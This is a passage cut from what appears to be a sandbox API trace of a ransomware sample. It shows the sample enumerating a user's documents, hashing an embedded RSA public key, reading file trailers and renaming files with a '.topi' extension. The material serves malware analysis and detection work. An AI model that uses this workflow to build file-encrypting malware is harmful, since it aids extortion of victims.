dwReserved1=0x0, cFileName="p6Wk0rU_y", cAlternateFileName="P6WK0R~1")) returned 1 [0097.071] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317edb0 [0097.071] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ebb8 [0097.071] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0097.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ebb8 | out: hHeap=0x680000) returned 1 [0097.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317edb0 | out: hHeap=0x680000) returned 1 [0097.072] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1e5f140, ftCreationTime.dwHighDateTime=0x1d5bdb1, ftLastAccessTime.dwLowDateTime=0x2be1de00, ftLastAccessTime.dwHighDateTime=0x1d5b5d2, ftLastWriteTime.dwLowDateTime=0x2be1de00, ftLastWriteTime.dwHighDateTime=0x1d5b5d2, nFileSizeHigh=0x0, nFileSizeLow=0x195a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qz2yAW_TmWN.xls", cAlternateFileName="QZ2YAW~1.XLS")) returned 1 [0097.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd6) returned 0x766b58 [0097.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.072] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\P63p r8YwN7PV\\qz2yAW_TmWN.xls") returned=".xls" [0097.072] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\P63p r8YwN7PV\\qz2yAW_TmWN.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\p63p r8ywn7pv\\qz2yaw_tmwn.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.072] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=6490) returned 1 [0097.072] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.075] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x1934, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.075] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.076] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.076] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.076] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x195a, lpOverlapped=0x0) returned 1 [0097.076] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.076] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0097.076] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.076] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.077] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df448) returned 1 [0097.078] CryptCreateHash (in: hProv=0x6df448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.078] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.078] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0097.078] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.078] GetLastError () returned 0x0 [0097.078] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.078] CryptReleaseContext (hProv=0x6df448, dwFlags=0x0) returned 1 [0097.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.078] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.078] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.078] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1960) returned 0x99f92d8 [0097.078] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a030e0 [0097.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c40 [0097.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a03128 [0097.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c58 [0097.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c88 [0097.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ca0 [0097.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.079] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0097.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c88 | out: hHeap=0x680000) returned 1 [0097.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ca0 | out: hHeap=0x680000) returned 1 [0097.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0097.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4ca0 [0097.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0097.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4c88 [0097.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0097.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ca0 | out: hHeap=0x680000) returned 1 [0097.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c88 | out: hHeap=0x680000) returned 1 [0097.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0097.080] GetCurrentThreadId () returned 0x8c4 [0097.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0097.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f8f10 [0097.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0097.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.080] GetCurrentThreadId () returned 0x8c4 [0097.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0097.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0097.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c88 [0097.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0097.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ca0 [0097.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.082] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\P63p r8YwN7PV\\qz2yAW_TmWN.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\p63p r8ywn7pv\\qz2yaw_tmwn.xls"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\P63p r8YwN7PV\\qz2yAW_TmWN.xls.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\p63p r8ywn7pv\\qz2yaw_tmwn.xls.topi")) returned 1 [0097.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.083] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x766b58 | out: hHeap=0x680000) returned 1 [0097.085] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33177c70, ftCreationTime.dwHighDateTime=0x1d5c27f, ftLastAccessTime.dwLowDateTime=0x9e8c4d10, ftLastAccessTime.dwHighDateTime=0x1d5b91e, ftLastWriteTime.dwLowDateTime=0x9e8c4d10, ftLastWriteTime.dwHighDateTime=0x1d5b91e, nFileSizeHigh=0x0, nFileSizeLow=0xd297, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zzCW5todK.ots", cAlternateFileName="ZZCW5T~1.OTS")) returned 1 [0097.085] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\P63p r8YwN7PV\\zzCW5todK.ots") returned=".ots" [0097.085] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\P63p r8YwN7PV\\zzCW5todK.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\p63p r8ywn7pv\\zzcw5todk.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.085] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=53911) returned 1 [0097.085] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.088] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xd271, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.088] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.090] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df448) returned 1 [0097.091] CryptCreateHash (in: hProv=0x6df448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.091] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.091] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.091] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.091] GetLastError () returned 0x0 [0097.091] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.091] CryptReleaseContext (hProv=0x6df448, dwFlags=0x0) returned 1 [0097.091] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.091] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.091] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.091] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.091] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.091] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.091] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.091] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd2a0) returned 0x9a06a00 [0097.092] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a03128 [0097.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c58 [0097.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a03170 [0097.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c70 [0097.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ca0 [0097.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4cb8 [0097.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.092] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0097.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ca0 | out: hHeap=0x680000) returned 1 [0097.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4cb8 | out: hHeap=0x680000) returned 1 [0097.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0097.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4cb8 [0097.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0097.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4ca0 [0097.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0097.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4cb8 | out: hHeap=0x680000) returned 1 [0097.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ca0 | out: hHeap=0x680000) returned 1 [0097.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, 